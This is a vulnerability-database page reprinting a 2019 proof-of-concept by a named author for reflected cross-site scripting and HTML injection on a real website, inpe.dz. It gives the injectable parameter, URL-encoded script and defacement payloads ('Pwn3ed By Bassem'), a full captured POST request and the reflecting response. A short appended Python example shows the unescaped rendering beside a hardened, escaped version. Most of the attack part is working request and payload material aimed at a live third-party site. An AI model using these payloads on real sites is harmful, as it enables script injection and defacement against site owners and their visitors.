inpe.dz Reflected Cross Site Scripting [ XSS ] | HTML Injection - CXSecurity.com

Vulnerability ID 1607072 Vulnerability type
Published 2019-05-13 Updated 2019-05-13
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2019050139
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit (EXP)
#############################################################
#  Title :  inpe.dz Reflected Cross Site Scripting [ XSS ]  | HTML Injection 
#  Author :  Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
#  Date : 11/05/2019
#  Home : Annaba ( Algeria )
#  Tested on : Linux ( Backbox )
#  Vendor : finpe.dz
#############################################################


 [ + ]   PoC  :


# XSS 
---------

#  inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche  < ==== Inject here


#  Payload : %3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E
   -----------

#  inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E    

     
--------------------------- Post Request ----------------------------------

POST /fr/?action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche HTTP/1.1
Host: inpe.dz
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://inpe.dz/fr/index_acc.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Connection: close
Cookie: fcspersistslider1=2; _ga=GA1.2.394734774.1557577567; _gid=GA1.2.1399442410.1557577567; style=null; __utma=67517641.394734774.1557577567.1557577593.1557583549.2; __utmz=67517641.1557583549.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/; __atuvc=41%7C19; __atuvs=5cd6d6bade5c6855014; __utmb=67517641.21.10.1557583549; __utmc=67517641; __utmt=1
Upgrade-Insecure-Requests: 1

recherche_mot=%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E


-----------------------------

---------------------- Response ----------------------------------

HTTP/1.1 200 OK
Date: Sat, 11 May 2019 14:38:26 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Accept-Ranges: none
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 57434

---------------------------------------------------------------------

<div class="container" >
 <div class="content_left">
	<h3> Résultat de la recherche</h3><script>alert(/hacked/)</script>	   <script language="javascript" type="text/javascript">

------------------------------------
The javascript code injected
-----------------------------------
 
# Html injection
-------------------

#  inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche  <===== Inject here

#   Payload : <center><h1>Pwn3ed By Bassem</h1></center>

#  http://inpe.dz/fr/?action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche%3Ccenter%3E%3Ch1%3EPwn3d%20By%20Bassem%3C/h1%3E%3C/center%3E

=======================================================

SHOOTZ  TO :  | Jag gar |  Lakarha_23 | Bl4ck

=======================================================
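
Added example (not part of the original advisory and not the site's code): the server-side fix for the reflection shown in the captured response, with the unescaped rendering next to a hardened one. The template layout, the function names and the allow-list are assumptions; the query string and form body are copied from the request above.

```python
import html
from urllib.parse import parse_qs

# Constructed inputs, copied from the request shown above (query string and form body).
QUERY = "action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche"
BODY = "recherche_mot=%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E"

# Assumption: the only heading this page legitimately displays.
ALLOWED_RUBRIQUES = {"Résultat de la recherche"}


def first(params, name):
    """Return the first decoded value of a parameter, or an empty string."""
    return parse_qs(params, keep_blank_values=True).get(name, [""])[0]


def render_unescaped(query, body):
    """Mirrors the captured response: request values are copied into the markup as-is."""
    return "<h3> " + first(query, "rubrique") + "</h3>" + first(body, "recherche_mot")


def render_hardened(query, body):
    """Allow-list the heading and HTML-encode every request value before output."""
    rubrique = first(query, "rubrique")
    if rubrique not in ALLOWED_RUBRIQUES:
        rubrique = "Résultat de la recherche"  # fall back to the fixed heading
    term = first(body, "recherche_mot")
    return "<h3> " + html.escape(rubrique) + "</h3>" + html.escape(term)


if __name__ == "__main__":
    print(render_unescaped(QUERY, BODY))
    print(render_hardened(QUERY, BODY))
    # GET variant: markup appended to rubrique is dropped by the allow-list.
    print(render_hardened(QUERY + "%3Ccenter%3E%3Ch1%3Ex%3C/h1%3E%3C/center%3E", ""))
```

Encoding at output time covers both the query parameter and the POST field; the allow-list additionally stops arbitrary text from being shown as the page heading.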